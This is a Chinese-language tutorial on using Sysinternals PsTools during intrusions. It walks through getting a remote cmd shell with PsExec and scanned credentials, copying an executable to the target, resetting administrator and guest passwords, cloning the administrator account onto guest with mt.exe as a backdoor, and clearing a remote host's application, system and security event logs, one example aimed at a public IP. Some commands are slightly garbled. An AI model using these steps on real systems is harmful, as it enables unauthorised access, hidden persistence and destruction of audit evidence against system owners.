pstool的介绍 PsTools是Sysinternals Suite中一款排名靠前的一个安全管理工具套件。现在被微软收购。目前pstools中含有12款各式各样的小工具。如果将它们灵活的运用,将会在渗透中收到奇效。所有的pstool第一次运行时都会弹框。可以用–accepteula这个参数绕过。 还有所有的pstool都支持IP$,一旦IP$共享是连接的就不用输入-u 和-p这两个参数。 如何建立IP$连接。命令如下: Net user \目标ip 密码 /user:用户 Net user \192.168.1.3 123456 /user:test 建立后所有的ps工具都将可以不用输入用户和密码了。 其中12款工具简介如下: ◆PsExec - 远程执行进程 ◆PsFile - 显示远程打开的文件 ◆PsGetSid - 显示计算机或用户的 SID ◆PsInfo - 列出有关系统的信息 ◆PsKill - 按名称或进程 ID 终止进程 ◆PsList - 列出有关进程的详细信息 ◆PsLoggedOn - 查看在本地通过资源共享(包含所有资源)登录的用户 ◆PsLogList - 转储事件日志记录 ◆PsPasswd - 更改帐户密码 ◆PsService - 查看和控制服务 ◆PsShutdown - 关闭并重新启动(可选)计算机 ◆PsSuspend - 暂停进程
Psexec 介绍
远程获取一个cmdshell 比如我再渗透中扫描到目标机(192.168.1.3)的一个用户名(test)和密码(123456)。 那我们的命令就是: psexec \目标ip -u 用户名 -p 密码 进程名 psexec \192.168.0.109 –u test –p 123456 cmd.exe
exit退出
这里看见不能空密码进行连接
限制 比guest权限大的用户都能登陆
PsExec \192.168.0.109 -u administrator -p 123456 -c k:ss.exe
pspasswd的应用详解
pspasswd \192.168.0.109 -u administrator -p 123456 guest 123456 用administrator改guest的密码
pspassword妙用
首先执行D:web|pspasswd.exe –accepteula (第一次执行,表示许可执行的意思) D:web|pspasswd.exe administrator yueyan 就会成功修改administrator的密码。 这里能修改密码的原因是pspasswd不是调用net.exe进行密码修改。 上述介绍常常配合mt.exe进行用户克隆。这里简单介绍: (关于mt.exe的详细介绍请访问:【工具】mt.exe的详细介绍)
首先mt.exe查看用户sid,比较后看是否有克隆账户
Mt -chkuser
比较后,没有克隆账户,我们选择guest这个账户进行克隆:
Mt –clone administrator guest
然后配合pspasswd修改密码:
Pspasswd guest yueyan
就这样成功克隆一个账户,并能成功登陆访问。
pskill+psinfo+pslist的应用详解
pskill \192.168.0.109 -u administrator -p 123456 cmd.exe
我再介绍psinfo的相关应用。 基本参数是: -h 显示已经安装的补丁信息 -s 显示已安装的软件信息 -d 显示磁盘信息 如果我们想看远程主机的基本信息,命令如下: psinfo –h –s –d \192.168.1.3 –u administrator –p 123456
PSLOGGEDON:查看指定计算机的本地及远程登录的用户和登录时间。必须建立在IP$共享下才可以使用这个工具。
其他ps工具介绍: PSLOGGEDON:查看指定计算机的本地及远程登录的用户和登录时间。必须建立在IP$共享下才可以使用这个工具。 命令如下: Psloggedon –l \192.168.1.3 PSLOGLIST:事件日志转储及管理。 这个对于渗透测试是非常有用的,它最大的特点就是远程清理系统日志。 常用: psloglist \72.56.17.74 application -c > nul psloglist \72.56.17.74 system -c > nul psloglist \72.56.17.74 security -c > nul 分别是清理应用程序日志,系统运行日志,安全日志。 PSSERVICE:管理服务。 常用: psservice query messenger 查询messenger服务的相关信息。 最重要的项目是:服务名称、显示名称、服务描述、服务类型、服务状态。 psservice config messenger 查询服务的配置信息。 最重要的项目是:服务名称、服务描述、服务类型、服务启动类型、服务错误控制级别、可执行文件的路径等等。 PSSHUTDOWN:关机工具。 常用命令: Psshutdown –s –t 60 60秒后关机。 下面几个不常用,就介绍下: PsFile - 显示远程打开的文件 Psfile \192.168.1.3 PsGetSid - 显示计算机或用户的 SID Psgetsid \192.168.1.3 PsSuspend - 暂停进程 Pssuspend \192.168.1.3 –u test –p 123456 cmd,exe